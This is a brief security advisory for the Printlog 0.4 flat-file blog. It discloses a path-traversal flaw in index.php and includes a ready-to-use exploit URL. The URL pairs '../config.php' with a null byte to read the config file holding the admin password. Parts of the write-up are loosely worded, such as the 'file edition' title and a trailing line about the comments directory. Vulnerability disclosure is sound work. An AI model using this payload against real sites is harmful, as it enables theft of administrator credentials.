-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Printlog <= 0.4: Remote File Edition Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
$ Program: Printlog
$ File affected: index.php
$ Version: 0.4
$ Download: http://www.hardkap.net/pritlog
Found by Pepelux <pepelux[at]enye-sec.org>
eNYe-Sec - www.enye-sec.org
– Description (by the author's page) –
PRITLOG is an extremely simple, small and powerful blog system. It does not
use or need a MYSQL database and fully works based on flat files. The idea
is derived from a similar app called PPLOG.
– Bug –
You can navigate and see the entries. Something like as:
http://localhost/p/index.php?option=viewEntry&filename=00001
Code doesn't check the comments directory:
– Exploit –
If magic quotes are off you can do:
http://localhost/p/index.php?option=viewEntry&filename=../config.php%00
config.php has the admin password